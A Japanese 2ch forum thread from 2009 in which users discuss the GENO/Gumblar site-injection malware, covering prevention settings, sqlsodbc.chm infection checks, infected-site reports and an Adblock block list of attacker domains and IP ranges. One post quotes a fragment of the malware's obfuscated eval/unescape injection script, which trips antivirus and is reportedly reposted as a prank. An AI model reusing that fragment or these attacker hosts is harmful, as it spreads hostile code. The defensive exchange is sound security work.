09/05/18 16:10:00 BZ5+cjSr0
感染予防対策
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例
1.Adobe Readerを起動し「編集」メニューの「環境設定」
「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
OKを押して設定確定後、Adobe Readerを終了。
↓
2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
設定は SpeedUp - Fast がおすすめ。
注意すべきは
Acroform(拡張子なし)
Annotations(拡張子なし)
これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
そうしないと Adobe Reader が起動しなかったりする。
このとき追加作業として
EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
より安心かもしれない。
以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
3:192.168.0.774
09/05/18 16:10:43 BZ5+cjSr0
以下攻撃されたサイト
小林製薬
URLリンク(www.kobayashi.co.jp)
国内の正規サイト改ざん:攻撃サイトを変え再襲来
URLリンク(www.so-net.ne.jp)
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
4:192.168.0.774
09/05/18 16:11:11 BZ5+cjSr0
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
URLリンク(www3.atword.jp)
5:192.168.0.774
09/05/18 16:11:47 ua7Ctj4Z0
>>1
テンプレの症状にある「再起動時にBSOD」は、起動時にLANケーブルが抜かれていたり、IPブロックされていると
攻撃者のIPに繋がらないため、クラッシュさせる挙動だそうです。
6:192.168.0.774
09/05/18 16:11:50 BZ5+cjSr0
【感染の確認方法】
①cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したら②へ
②sqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
③avast!(無料のアンチウイルスソフト)で確認
7:192.168.0.774
09/05/18 16:12:22 wsKEiiw60
【感染の確認方法】■ Windows XP(5月18日現在)
1 C:\WINDOWS\system32\sqlsodbc.chmを開いて壊れていたら感染濃厚
2 ↑のファイルサイズを確認する
正常値 日本語版ヘルプ 50,727 bytes
英語版ヘルプ 46133
ドイツ語ヘルプ 48401
フランス語ヘルプ 49345
スペイン語ヘルプ 48475
改竄されたsqlsodbc.chmの一例
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
:
8:192.168.0.774
09/05/18 16:14:07 IfMEin9r0
Aviraたん何か更新きた
Virus definition file 7.01.03.218 2009/05/18
9:192.168.0.774
09/05/18 16:15:58 BZ5+cjSr0
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。
初心者や質問がある方は
スレリンク(doujin板)
上記のスレに行くと優しく教えてくれるかもです
Adobe Flash Player バージョンテスト
URLリンク(www.adobe.com)
改竄されたsqlsodbc.chmは
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
正常な場合50,727バイト(日本語)です。
10:192.168.0.774
09/05/18 16:16:46 EMdE+yZc0
仕事行って来たんだけど、昨日の夜から何か出来事あった?
11:192.168.0.774
09/05/18 16:17:04 k2CI1leb0
>>1
スレ立て乙。
ちとしばらく潜るわ。
動作が不安定になる種も探したいし。
12:192.168.0.774
09/05/18 16:17:32 BZ5+cjSr0
>>7
VistaUltimateでは多言語での利用が可能ですが、複数sqlsodbc.chmが存在する場合はインストール済みの言語分存在する・・・かもしれません。
13:192.168.0.774
09/05/18 16:23:05 HT0KAN7x0
>>1乙
同人板は既に8スレ目であり、現状スレタイで質問禁止になっている
14:192.168.0.774
09/05/18 16:23:43 wU1qChfhP
>>1 乙
情報多すぎて混乱してる人は、とにもかくにもAdobe製ツールを最新に
ブラウザ毎に最新にするんだぞ
15:7
09/05/18 16:23:55 wsKEiiw60
>>12
とりあえずXPだけまとめてみた
cmdもregeditも無問題でスキャンもすり抜けらしいので
vistaの改変例てどこかありましたか?
あと2kの判定方法も
16:192.168.0.774
09/05/18 16:25:04 ZMLDN5880
>>13
何故かスレタイは無視して良いってことになってる。
17:192.168.0.774
09/05/18 16:26:57 JmCcr4Q60
>>15
sqlsodbc.chmだがテンプレだと2kには無いってあるが家の2kSP4の奴には>7の英字版ヘルプと同サイズのが入ってた
だからこれも環境依存、かねぇ?
18:192.168.0.774
09/05/18 16:28:56 +m52NSIq0
乙なんじゃないのかな
19:192.168.0.774
09/05/18 16:29:01 duGXzOvm0
>>17
感染すると2kにもsqlsodbc.chmが出来るって聞きましたが
20:192.168.0.774
09/05/18 16:29:13 eM8L/6820
>>1 乙です
間違って zlkonウイルス擦れ 行ってたw
21:192.168.0.774
09/05/18 16:30:26 2R5fa0YFP
火狐の先読みって切らなくても大丈夫なん?
22:192.168.0.774
09/05/18 16:30:30 eOHkXG3n0
>>5
起動時にLANケーブルがついていたり
IPブロックされていなければ、
攻撃者のIPにつながるから、クラッシュさせる挙動をとらない
ということになるの?
23:192.168.0.774
09/05/18 16:33:41 JmCcr4Q60
>>19
あぁ、普段ネットワークに繋いでない非常時起動用の奴(ウィンアプデとかの時だけ繋ぐ)なんで
感染して作られたっつー可能性は低い、と思う(ヘルプとして開くしね)
24:192.168.0.774
09/05/18 16:35:50 8wGPADB70
★GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
★このサイトは諸事情により内容を書き換え
URLリンク(www3.atword.jp)
これって上が正しいの?
もうまとめすら見るのが怖いんだが
25:192.168.0.774
09/05/18 16:38:13 k2CI1leb0
>>17
Windows 2000には標準では存在しない。
標準ではsqlsodbc.hlpしかない。
Visual StudioやMSDE、MSSQLをインストールすると入ると思う。
あるいはMDAC(Microsoft Data Access Components)をインストールしても
入る。
動作が不安定になる種が落ちてこないなぁ。
26:192.168.0.774
09/05/18 16:38:28 8UXA7HKu0
2kだけど
C:\WINDOWS
これがまずないんだがフォルダごと作られるってこと?
C:\WINNT\system32になら
sqlsodbc.hlpとsqlsodbc.GIDてのあったからかわりにここに作られる?
27:192.168.0.774
09/05/18 16:39:22 eM8L/6820
>>24
どちらも安全
28:192.168.0.774
09/05/18 16:40:36 +m52NSIq0
>>21
切っておこうぜ
29:192.168.0.774
09/05/18 16:41:44 +m52NSIq0
>>26
おっしゃるとおり、2kの場合はC:\WINDOWSを
C:\WINNTとして置き換えないといけない
30:192.168.0.774
09/05/18 16:42:08 8wGPADB70
>>27
ありがと
早くノートン対応してほしい・・・おちおちネットもしてられないなんて
31:192.168.0.774
09/05/18 16:42:25 k2CI1leb0
>>26
作られるとしたら、%Windir%のC:\WinNT以下のフォルダのはず。
32:192.168.0.774
09/05/18 16:42:47 JmCcr4Q60
>>25
あぁ仕事用としても使えるように当初作ったからその辺入ってるな。安心した
>>26
win2kの場合WINNTがデフォルト(NTの名残)XPになってWINDOWSがデフォルトに(Win95系終焉して統合したから)
なのでXPで\WINDOWS~って時は2kだと\WINNT~と読み替えるのが基本
33:192.168.0.774
09/05/18 16:47:11 8UXA7HKu0
>>29,31,32
なるほど
ありがとうございます
34:192.168.0.774
09/05/18 16:47:20 k2CI1leb0
>>32
ちなみにMDAC 2.8日本語版のsqlsodbc.chmのサイズは50,727 バイト(2003/06/27 17:06:44)
だった。
35:192.168.0.774
09/05/18 16:55:40 8GKrEP5/O
手書きブログ感染って本当?
ウイルスチェッカーでは調べることが出来ないんでわかる人居たら教えて
36:192.168.0.774
09/05/18 16:56:46 k2CI1leb0
>>5
これ試してみたけど、今飼ってるおとなしい奴はネットワークアダプタ
殺したり、ケーブル抜いたりしても普通に立ち上がるな。
37:192.168.0.774
09/05/18 16:56:53 rNK1DQEo0
>>35
チェッカーにかけなくてもソース見ればいいと思うよ
38:192.168.0.774
09/05/18 16:59:00 trRzScO50
FirefoxでAdblockPlus使ってるんだけど、気休めにフィルタ追加してみた
これで利くのかな?
*/94.229.[64-79].[0-255]/*
*/94.247.[2-3].[0-255]/*
*/95.129.[144-145].[0-255]/*
gumblar.cn
zlkon.lv
martuz.cn
bigtopsuper.cn
findyourbigwhy.cn
39:192.168.0.774
09/05/18 16:59:28 +lw3mpsu0
>>36
怖すぎるだろそれ…
まだ絶対クラッシュしてくれる方がありがたい。
自分が感染しているかどうか確証が持てない方が怖すぎる。
40:192.168.0.774
09/05/18 17:00:56 k2CI1leb0
>>35
google-analyticsの呼び出しでunescape使ってるから誤検知したんじゃないかな?
41:192.168.0.774
09/05/18 17:00:59 8GKrEP5/O
>>37
ざっとソースみても疑わしいものはなかったよ
それに手書きブログ踏んでみたけどavastたん反応しなかったし
詳しい人まじ詳細おね
42:192.168.0.774
09/05/18 17:01:50 s8PVU+vD0
>>1に書いてある症状でこのスレで追試できたのをまとめて欲しいな。
43:192.168.0.774
09/05/18 17:02:40 3Wf1BgQ0O
>>35
リンク集の方にURL載ってるが詳しくはわからん
報告ありしか書いてないからガセの可能性高い
44:192.168.0.774
09/05/18 17:04:18 7k/9HGtp0
>>37
前使ったことあって気になったから調べてみたけどchromeもavastも怒らない
jsファイル含め怪しい箇所もない
やっぱりgoogleのタグ誤検知かと
45:192.168.0.774
09/05/18 17:05:23 rNK1DQEo0
>>41
出たのがVIPで誰も相手にしてない感じだしガセなんじゃない?
手ブロのスレッドでも誰も何も言ってないし
46:192.168.0.774
09/05/18 17:05:25 7k/9HGtp0
安価ミス
>>44は>>37じゃなくて>>41ね
47:192.168.0.774
09/05/18 17:06:07 8GKrEP5/O
>>40
誤検知かな・・・誤検知だったらいいんだが
>>43
本当にガセなのかわかればいいんだがあいにく私は調べ方わからんからなあ・・
>>44
やっぱりそうなのかな
とりあえず様子見てみることにするよ
48:192.168.0.774
09/05/18 17:08:45 F+zztV0c0
手ブロ見に行ってみたけどavastは暴走しなかったな
普通に見れるしソースもそんなおかしいのないしガセっぽいね
49:192.168.0.774
09/05/18 17:09:22 wU1qChfhP
>>35
ぱっと見では大丈夫そう
どうでもいいけど、そこソースが割と綺麗だな
ある程度手打ちで書いたのか
50:192.168.0.774
09/05/18 17:12:35 eM8L/6820
URLリンク(pipa.jp) 怪しいスクリプト入っていません
ガセですね
51:192.168.0.774
09/05/18 17:16:26 hMt5GVQZ0
ネットカフェのPCって再起動したら設定とかもとに戻るんだっけ?
自PCでどこが安全か調べるのが怖いから
ネカフェ行ったほうがいいんだろうか。
52:192.168.0.774
09/05/18 17:16:42 7k/9HGtp0
URLリンク(geno.2ch.tc)
>URLでないと判断されました。
>評価ミス報告
そもそもこのチェッカーがおかしいと思うんだ
どういう風に組んだらこういう結果が出るんだよ
53:35
09/05/18 17:19:15 8GKrEP5/O
みなさん本当にありがとうございます
一応誤検知だということでいいですかね?
因みに>>47は私ですすいません
パソコンからじゃ書き込めないんで携帯から失礼しました
54:192.168.0.774
09/05/18 17:19:38 PGXf1oVHO
>>51
感染したらどうするつもり?
55:192.168.0.774
09/05/18 17:19:40 Anj4hR3G0
>>52
それを組んだのはセキュ板の方?
56:192.168.0.774
09/05/18 17:23:05 kh9I2kSv0
>>52
やってみたけど
診断できるぞ?
>危険度0%
>安全なURLです。踏んでも大丈夫でしょう。
誰か評価ミス送ったのかな?
57:192.168.0.774
09/05/18 17:25:00 eM8L/6820
【鑑定目的禁止】検出可否報告スレ10 より転載
gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
58:192.168.0.774
09/05/18 17:30:38 R2ICsyNGO
感染してるサイトをこのチェッカーで調べても
なんも出てこないの俺だけ?
59:192.168.0.774
09/05/18 17:34:30 wU1qChfhP
使ってないから知らんけど、チェックしてるページが違うとか
60:192.168.0.774
09/05/18 17:37:01 DC1VgNqQ0
俺もやってみたけど0%だった
昨日の成美堂はちゃんとなったんだけどな
61:192.168.0.774
09/05/18 17:38:55 k2CI1leb0
>>5
別の種で試してみたら、再現した。
前の種で再現しなかったのは、いったんmartuz.cnに接続して
アクティブになったら発動しないってことなのかも??
62:192.168.0.774
09/05/18 17:40:44 R2ICsyNGO
鳥骨鶏とかリボンマジックが0になる
63:60
09/05/18 17:40:56 DC1VgNqQ0
あ、ごめんちゃんとなった
64:192.168.0.774
09/05/18 17:41:26 eM8L/6820
烏骨鶏やっとサイト閉じたな
65:192.168.0.774
09/05/18 17:45:06 lbjdJxFz0
確認する際は、キャッシュをしっかり削除してから。
とりあえず、ここまでF-Secure SASからの回答なし。
今夜くらいから動いてくれるのかね…今10時くらいだと思うし。
66:192.168.0.774
09/05/18 17:47:13 j9Y4xggD0
>980 192.168.0.774 sage 2009/05/18(月) 15:27:48 ID:gw0F+TVl0
>通称「GENOウイルス」・同人サイト向け対策まとめ
>URLリンク(www31.atwiki.jp)
>にある
>ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定
>ですが
>URLリンク(esupport.trendmicro.co.jp)
>の注意書きにある ・・・
もう一度読み直してみるとGENOウイルスの動作では
同人サイトのファイアウォールの設定は危険ではないか
その設定をよく見ると、
例外ルール(プロトコル)のみの設定しかなく
例外ルール(プログラム)側のInternet Explorerのデフォルトが全て許可なので
実際に試したわけでないが、そこから抜けると思われ
67:192.168.0.774
09/05/18 17:50:55 lbjdJxFz0
>>48
おそらく unescapeの文字を見かけて危険と判断したと思われ。
…といっても、google-analytics.com のアクセス解析のみで、問題となるコードが無いか目視で確認しましたが、特に見当たりません。
68:192.168.0.774
09/05/18 17:52:30 ua7Ctj4Z0
>>6
>③avast!(無料のアンチウイルスソフト)で確認
だから、そこ消して!!
Avastは、スクリプトが仕込まれたページの大半(反応しないものも確認されています)で反応しますが
落ちてきた本体に感染しているかどうかのチェックには使えません。
69:192.168.0.774
09/05/18 17:57:46 mHe74bNo0
URLリンク(www.so-net.ne.jp)
ここのニュースを読むと犯人は中国のドメイン名だが、
サイトはロシアでホストに移動して活動しているとあるけど
この大元から犯人が捕まる可能性ってどのぐらいなんだ?
ウイルス作って逮捕されたやつ沢山いるが日本県警じゃムリだろうか
70:192.168.0.774
09/05/18 17:58:16 5fyyAw/a0
GenoVirus感染サイトリストで、感染の疑いがあるサイトのalfa-radio●comは、
ソース見る限り感染してるように見えないんだがどうだろう?
71:192.168.0.774
09/05/18 18:00:00 dFHP9qyG0
>>69
海外でも感染広がってるらしいから日本県警より海外の警察に任せたほうがよさそうだな
72:192.168.0.774
09/05/18 18:00:11 eOHkXG3n0
>>59
チェッカーは精度に問題あるから。
73:192.168.0.774
09/05/18 18:01:43 ua7Ctj4Z0
>>70
現時点では感染してる様子はありませんね。ソース見たけど入ってない。
74:192.168.0.774
09/05/18 18:01:47 wEi5/cqd0
なんかテンプレが古いな
gumblar.cnとかavastとかNoScriptとか
新種はmartuz.cn
avastは>>68
Fxを使用していてもNoScriptを使用する必要はないし
ブラウザもFxである必要はない
というかブラウザ依存のウイルスではないので
ブラウザを指定する必要はない。
ちょろめだけJSをオフれないということなのでそこだけ注意すればいいかと
75:192.168.0.774
09/05/18 18:01:55 JmCcr4Q60
>>69
中国、ロシア辺りだとおそらく無理だろなぁ…
ネトゲの垢ハックとかで被害届出してゲーム運営がログ提供しても最終的に中国とかロシアとかその手の方面で
追跡不能~ってなるのがほとんどだそうだ。
76:192.168.0.774
09/05/18 18:02:31 j9Y4xggD0
ノートンのファイアウォールもウイルスバスターより癖が強いから
設定の甘さでファイアウォールをしていてもなんの意味を持たないことにもなる
もう一度下記サイトの各種設定を見直す必要があると思われ
URLリンク(www31.atwiki.jp)
77:192.168.0.774
09/05/18 18:05:50 v6qQswXM0
URLリンク(genolists.alink.uic.to)
ここの管理人の人まだ見てるかな?
リストが増えてきたんで、重複とか、タレコミを受けて閉鎖対処したサイトとか、
あとろくに自力で調べもしない人が噂だけ鵜呑みにして「確定サイト」扱いで登録した白サイトとかあるから
できれば管理人権限で整理してくれると助かります
っていうかちゃんと役に立ってるのかな?このリスト
78:192.168.0.774
09/05/18 18:06:50 FI6RkFNE0
【議論OK】GENOウイルス晒しスレ
スレリンク(doujin板)
79:192.168.0.774
09/05/18 18:07:29 mHe74bNo0
>>71
海外の警察のほうが頼りになるか
そうだな
80:192.168.0.774
09/05/18 18:08:18 eM8L/6820
>>70
私も見ましたけど怪しいスクリプトは無いですね
81:192.168.0.774
09/05/18 18:08:31 EgqX730p0
いっそロシアンマフィアのPCクラッシュさせて消されればいい
82:192.168.0.774
09/05/18 18:10:31 mHe74bNo0
>>75
イギリスに移動したとあるからその辺に期待
アメリカにいかないのは危険だと思っているのだろうかやはり
83:192.168.0.774
09/05/18 18:11:58 wU1qChfhP
>>70
俺も大丈夫だと思うけど、どうだろうな
>>40辺りの理由かも
84:192.168.0.774
09/05/18 18:12:50 eM8L/6820
今回のウイルスは巨大botnetを作るのが目的だとか?
どこかのサイトで見ました。犯罪者集団ですね
85:192.168.0.774
09/05/18 18:14:41 3Wf1BgQ0O
>>77
微妙な所だね
自分でも感染サイト探してるけどなかなか難しい
86:192.168.0.774
09/05/18 18:14:43 KeDzETgR0
>>8
週末に騒ぎが始まってから
ずっと1時間おきくらいにうpだて手動チェックしてるが
ログ見返したら25回くらい更新があった
日本語じゃないせいか全然話題に上らないが
これはちゃんと仕事してくれてると思っていいんだよな?
87:192.168.0.774
09/05/18 18:18:44 yY1zypbb0
>>84
so-net セキュリティ通信
URLリンク(www.so-net.ne.jp)
これだね
88:192.168.0.774
09/05/18 18:22:50 8GKrEP5/O
>>78
avastたん反応したんだが
なにこれ
89:192.168.0.774
09/05/18 18:24:43 lbjdJxFz0
>>88
avastが反応するようなコードが名前欄に貼ってあるから
90:192.168.0.774
09/05/18 18:26:38 gM07vQcn0
>>88
Avastが今回の騒ぎに使われてるJavascriptの一部分をシグニチャとして持ってて、
その文字列を含んでるので反応する。
一時期流行ったLoveLetterの一部貼ってノートン反応するのと一緒。
91:88
09/05/18 18:28:03 8GKrEP5/O
>>89
なんだ・・
URLのよく出来た釣りに引っ掛かったのかと思った
92:192.168.0.774
09/05/18 18:28:07 ivBmAr0O0
>>77
それ編集とか削除するためには登録者のパスワードが必要だよね。
有志が編集できるように共通のパス決めといた方がいいと思うんだが。「geno」とか。
93:192.168.0.774
09/05/18 18:28:43 EMdE+yZc0
>>78
おい専ブラなのにavast怒ったぞ。
スレ一覧全部飛んだじゃねーか死ね
94:192.168.0.774
09/05/18 18:29:17 jHA8BSMo0
なんでこんな深刻な被害ありそうなのに
2chの一部でしか警戒されてないんだ?
今までのウイルスも最初はこんな感じなのかな?
95:192.168.0.774
09/05/18 18:29:51 9chuMM1o0
>>91
専ブラで2ch見てるなら、専ブラのフォルダを除外指定すれば
その手のテキストで書かれただけのソースコードは引っ掛からなくなるよ
96:192.168.0.774
09/05/18 18:30:18 ua7Ctj4Z0
>>84,>>87
こっちのほうがハッキリ書いてある。
URLリンク(www.aladdin.co.jp)'s-weekend.html
97:192.168.0.774
09/05/18 18:30:36 yY1zypbb0
>>94
見た目が派手じゃないから
98:192.168.0.774
09/05/18 18:32:20 TM5Ovwjd0
幼女ウィルスみたいに具体的に何されてるか分からないからなぁ
99:192.168.0.774
09/05/18 18:33:09 v6qQswXM0
>>92
そうなんだよね、登録者or管理者でないと編集・削除が出来ないから
重複や誤報のURLの削除を迅速にするには、それが一番いい
次回からgenoで統一してもらうようにする?
100: ◆f/iQdjPxCM
09/05/18 18:33:35 76hdi/6T0
前スレに引き続き。
もはや当てにはなるまい cmd.exe や regedt32.exe/regedit.exe の起動や、
環境条件依存性の強い sqlsodbc.chm ではなく、
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\
の方から調べてみるアプローチの模索。
まだ試作段階で結果は信用できる段階にありません。
一般的見地からはこれ自体が「不審なEXEファイル」なので、
俺が言うのもなんだけど、一般の人は少なくとも、
玄人が仮想環境等を使って害が無さそうなことを確認してくれるまでは、
手を出さないこと推奨、かね。
想定ターゲットは win2k/xp(32bit).
仮想環境でブツを飼ってる玄人で暇な人はテストにお付き合い頂ければ幸いです。
GENOdetect_v003.LZH
URLリンク(www1.axfc.net)
DLkey: testGENOdetect
GENOenvinfo_v003.LZH
URLリンク(www1.axfc.net)
DLkey: testGENOdetect
SIZE (GENOdetect.exe) = 8192
MD5 (GENOdetect.exe) = f228b8db63dba8175ec6579f8a87c6d7
SHA1 (GENOdetect.exe) = b263461103e693d4ce2be15757ded9ec544821d5
SHA256 (GENOdetect.exe) = 67e3465d9dd8eac015853103d2ec16f58ac78ec3b9cc706476f5dc53b1f49cb3
SHA512 (GENOdetect.exe) = 1ec0ab0588484c4622e37c968619a142c7ff92ce39ed6045dfda7d8294d28eb7443d02e1725793b2ff088e25a2602fc14a072e30d456534dedc271d55047c74e
SIZE (GENOenvinfo.exe) = 9216
MD5 (GENOenvinfo.exe) = cbf1b467b0082b665c95c55f4e090cf8
SHA1 (GENOenvinfo.exe) = 7bf9cba9e1aa4c47e3c035e4077308cb29fd073b
SHA256 (GENOenvinfo.exe) = 3f375b58e6e38ac95c187e9bc9b0cd997d8373be5f5d61913f520c4cf71caa29
SHA512 (GENOenvinfo.exe) = 0171c6a410d10ecc6a1b6c1793f19a9d4f7fd68aac8a1b430da7c6f08e41a7c6a56496d100be50290c75ee95b1edeacb08cb71df0f7f7d6c7da11632f2036d09
detect の方が最終的に一般向けになれれば版、
envinfo の方がdebug目的で GENOenvinfo_log.txt を生成する版。
GENOenvinfo_log.txt はユーザ名(ログオン名)が含まれる場合がありますので、
テストに協力して頂ける等で公開する際にはご注意下さい。
101:192.168.0.774
09/05/18 18:33:59 3VJel2as0
(){eval(unescape(('Script(t,'%')))})(/./g);
この文字列をNGワードにすれば良いのでは?
これはウイルスではありませんので安心してください。
102:192.168.0.774
09/05/18 18:36:05 4ySopLDi0
おい更新したらavastが反応したぞコラ
103:192.168.0.774
09/05/18 18:36:51 ivBmAr0O0
>>99
とりあえず俺が登録するときはパスは「geno」にしときますわ
104:192.168.0.774
09/05/18 18:36:56 8GKrEP5/O
>>99
パスワードを知った愉快犯が変にいじくってしまったらどうする?
105:192.168.0.774
09/05/18 18:37:02 r2xJxp6a0
更新したら心臓止まりそうになったわ
106:192.168.0.774
09/05/18 18:39:48 duvNIOfD0
GENO URLチェッカーは、まだ未完成と・・・・
GENOウィルスツールの検出精度ってどうなんだろ?
107:192.168.0.774
09/05/18 18:40:21 QTaoO352O
スレ更新したら反応したんだけど・・・
マジでやめてくれよ
108:192.168.0.774
09/05/18 18:40:33 enUpbFMt0
統計的に有意性を取ってみたいが検証する暇がない
109:192.168.0.774
09/05/18 18:40:36 bV3w8TeO0
セキュ板の本スレ何なんだ、いつの間にか二桁いってるし
GENO感染時にいたみんなはここに避難したかんじかな?
>>78 のスレ、avastが反応するな
110:192.168.0.774
09/05/18 18:41:40 WUiMUIup0
ここもavast反応するんだが…
111:192.168.0.774
09/05/18 18:42:37 IfMEin9r0
Virus definition file 7.01.03.218 2009/05/18
Virus definition file 7.01.03.219 2009/05/18
Virus definition file 7.01.03.220 2009/05/18
Avira今日だけで3回更新w
112:192.168.0.774
09/05/18 18:42:50 cNzce2cIP
どこのバカだウイルスのコード貼ったの
avastさん激怒でアクセスできなくなったじゃねーか!
113:192.168.0.774
09/05/18 18:43:33 eM8L/6820
>>109
ここに引っ越してますよ^^
114:192.168.0.774
09/05/18 18:43:33 8GKrEP5/O
avastたんかわいいよavastたん
115:192.168.0.774
09/05/18 18:43:48 nYc6GBj10
この程度で騒ぐな情弱ども
116:192.168.0.774
09/05/18 18:44:42 9chuMM1o0
このスレでavastが反応する人は
タスクのavastアイコンクリックして標準シールド→詳細な設定→追加設定タブで
下のところにある除外設定で専ブラのフォルダ指定すれ
117:192.168.0.774
09/05/18 18:44:54 UYH62RHM0
>>101
ウィルスコードだな
このスレまで反応したぞw
2のログでAVASTがうぃーんうぃーんするのは慣れてるからコードとは思ったが
知らない人は驚くな
118:192.168.0.774
09/05/18 18:45:17 3Wf1BgQ0O
>>94
感染してるの気付きにくいから
119:192.168.0.774
09/05/18 18:45:24 7k/9HGtp0
ここの住民はほとんどセキュ板と同じだと思ってたけど違うのな
120:192.168.0.774
09/05/18 18:45:56 wU1qChfhP
単純に文字列追ってるんだな>avast
121:192.168.0.774
09/05/18 18:46:17 ivBmAr0O0
>>104
とりあえず魚拓取っておいた。
このCGIにバックアップ機能があるのかわからないが、
もしないなら定期的に魚拓取っておいてそこから復旧すればいいんでないか
122:192.168.0.774
09/05/18 18:46:26 3Wf1BgQ0O
>>109
もうあっちは隔離スレになったよ
123:192.168.0.774
09/05/18 18:46:28 cNzce2cIP
p2使っている俺はどうすれバインダー
124:192.168.0.774
09/05/18 18:46:39 ua7Ctj4Z0
p://www■mikesquarter■com/
感染確認したが、海外のサイトな上、コンタクトが(感染するスクリプトのあるページの)フォームなので、
サイト管理者への連絡はパス。
125:192.168.0.774
09/05/18 18:47:05 8GKrEP5/O
専ブラじゃないんだが
126:192.168.0.774
09/05/18 18:47:14 bV3w8TeO0
おい、ここもかよ
コード貼るなら無効にしてからはれよ
127:192.168.0.774
09/05/18 18:48:25 lbjdJxFz0
検体スレにも書きましたが、
F-Sercure SAS登録分の回答で、
検体報告のあったmartuz.cn新種(2009/05/17版)については次回DB更新にて対応とのこと。
128:192.168.0.774
09/05/18 18:49:22 nYc6GBj10
ほんと無能やつってジャマだわ
黙って無効化ろよ
129:192.168.0.774
09/05/18 18:53:48 fOCJVXyt0
>>78
うちのアバたんが全く反応しない
130:192.168.0.774
09/05/18 18:56:45 eM8L/6820
URLリンク(genolists.alink.uic.to) ここの鉄道110号のページは確定↓
URLリンク(safebrowsing.clients.google.com)
131:192.168.0.774
09/05/18 18:59:41 EGMN69Mk0
昨日、>>2の感染予防対策 とIEのスプリクトをよく解らないから全部無効にした後
やけにパソコンが重いからタスクマネージャーで調べたら
cmdが勝手に起動
カスペルのアップデートが30分経っても5%
Windows Updateサイトも最終段階で弾かれる
ワンケアも弾かれた
cmdを閉じWindows Updateの指示にしたがい操作したら無事Update終了
常駐させてるカスペルも元に戻った
sqlsodbc.chmのサイズは問題なし。再起動も問題なく出来た
ワンケアのオンラインスキャンだけはまだ出来ない・・・
情弱なので感染してるのかしてないのか謎
132:192.168.0.774
09/05/18 19:01:00 jTJy2IbM0
>>109
向うは早すぎて、時間が無いとついていけない
あっちは流し読みして、こっちをメインの情報源にしてる
133:192.168.0.774
09/05/18 19:01:01 XBZCbjSj0
URLリンク(www.3nell.net)
genoウイルス臨時できてるよ
134:192.168.0.774
09/05/18 19:02:46 7k/9HGtp0
fc2公式で注意促してんのな
URLリンク(web.fc2.com)
既出?
135:192.168.0.774
09/05/18 19:03:38 nup6y9oC0
>>134
既出だな
136:192.168.0.774
09/05/18 19:04:27 8osgued70
>>131
してないと思うよ
137:192.168.0.774
09/05/18 19:04:47 QTaoO352O
>>101
このコードを他スレに貼って遊んでる奴が居るぞ
138:192.168.0.774
09/05/18 19:04:47 eOHkXG3n0
>>134
このスレでは初。
fc2は、トップで注意しかしないのか?
ブログ所有者ににメールおくったりしないのか?
139:192.168.0.774
09/05/18 19:05:02 tx4jLtmT0
fc2はずっと前から注意促してたぞ
少なくとも5月頭くらいには
140:192.168.0.774
09/05/18 19:05:03 fJpq/HP00
>>53
確認したがウイルスは存在しなかった
141:192.168.0.774
09/05/18 19:05:31 eM8L/6820
聖帝♂♂検索これも確定
